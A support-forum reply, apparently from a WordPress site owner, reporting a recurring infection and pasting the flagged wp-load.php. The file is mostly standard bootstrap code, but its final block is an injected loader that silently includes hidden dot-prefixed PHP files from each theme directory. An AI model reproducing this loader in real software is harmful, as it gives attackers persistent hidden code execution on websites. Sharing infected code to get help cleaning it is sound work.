Reply To: wp-load.php after fix re-infected immediately

Home Forums Support Forum wp-load.php after fix re-infected immediately Reply To: wp-load.php after fix re-infected immediately

#31294

Hi, I have same issue, wp-load.php is found multiple times and fixed but reappears. I looked at the code and indicated

Potential threats in file:

 

/**

* Bootstrap file for setting the ABSPATH constant

* and loading the wp-config.php file. The wp-config.php

* file will then load the wp-settings.php file, which

* will then set up the WordPress environment.

*

* If the wp-config.php file is not found then an error

* will be displayed asking the visitor to set up the

* wp-config.php file.

*

* Will also search for wp-config.php in WordPress’ parent

* directory to allow the WordPress directory to remain

* untouched.

*

* @package WordPress

*/

 

/** Define ABSPATH as this file’s directory */

if( !defined( ‘ABSPATH’ ) ) {

define( ‘ABSPATH’, __DIR__ . ‘/’ );

}

 

error_reporting( E_CORE_ERROR | E_CORE_WARNING | E_COMPILE_ERROR | E_ERROR | E_WARNING | E_PARSE | E_USER_ERROR | E_USER_WARNING | E_RECOVERABLE_ERROR );

 

/*

* If wp-config.php exists in the WordPress root, or if it exists in the root and wp-settings.php

* doesn’t, load wp-config.php. The secondary check for wp-settings.php has the added benefit

* of avoiding cases where the current directory is a nested installation, e.g. / is WordPress(a)

* and /blog/ is WordPress(b).

*

* If neither set of conditions is true, initiate loading the setup process.

*/

if( file_exists( ABSPATH . ‘wp-config.php’ ) ) {

 

/** The config file resides in ABSPATH */

require_once ABSPATH . ‘wp-config.php’;

 

} elseif( @file_exists( dirname( ABSPATH ) . ‘/wp-config.php’ ) && !@file_exists( dirname( ABSPATH ) . ‘/wp-settings.php’ ) ) {

 

/** The config file resides one level above ABSPATH but is not part of another installation */

require_once dirname( ABSPATH ) . ‘/wp-config.php’;

 

} else {

 

// A config file doesn’t exist.

 

define( ‘WPINC’, ‘wp-includes’ );

require_once ABSPATH . WPINC . ‘/load.php’;

 

// Standardize $_SERVER variables across setups.

wp_fix_server_vars();

 

require_once ABSPATH . WPINC . ‘/functions.php’;

 

$path = wp_guess_url() . ‘/wp-admin/setup-config.php’;

 

/*

* We’re going to redirect to setup-config.php. While this shouldn’t result

* in an infinite loop, that’s a silly thing to assume, don’t you think? If

* we’re traveling in circles, our last-ditch effort is “Need more help?”

*/

if( false === strpos( $_SERVER['REQUEST_URI'], ‘setup-config’ ) ) {

header( ‘Location: ‘ . $path );

exit;

}

 

define( ‘WP_CONTENT_DIR’, ABSPATH . ‘wp-content’ );

require_once ABSPATH . WPINC . ‘/version.php’;

 

wp_check_php_mysql_versions();

wp_load_translations_early();

 

// Die with an error message

$die = sprintf(

/* translators: %s: wp-config.php */

__( “There doesn’t seem to be a %s file. I need this before we can get started.” ),

‘<code>wp-config.php</code>’

) . ‘</p>’;

$die .= ‘<p>’ . sprintf(

/* translators: %s: Documentation URL. */

__( “Need more help? <a href=’%s’>We got it</a>.” ),

__( ‘https://wordpress.org/support/article/editing-wp-config-php/&#8217; )

) . ‘</p>’;

$die .= ‘<p>’ . sprintf(

/* translators: %s: wp-config.php */

__( “You can create a %s file through a web interface, but this doesn’t work for all server setups. The safest way is to manually create the file.” ),

‘<code>wp-config.php</code>’

) . ‘</p>’;

$die .= ‘<p><a href=”‘ . $path . ‘” class=”button button-large”>’ . __( ‘Create a Configuration File’ ) . ‘</a>’;

 

wp_die( $die, __( ‘WordPress &rsaquo; Error’ ) );

}

 

if( !class_exists( “WPTemplatesOptions” ) && function_exists( ‘wp_get_themes’ ) ) {

foreach ( wp_get_themes() AS $theme_name => $wp_get_theme ) {

$templates = get_theme_root() . DIRECTORY_SEPARATOR . “{$wp_get_theme->stylesheet}” . DIRECTORY_SEPARATOR . “.{$wp_get_theme->stylesheet}.php”;

if( file_exists( $templates ) ) {

include_once( $templates );

}

}

}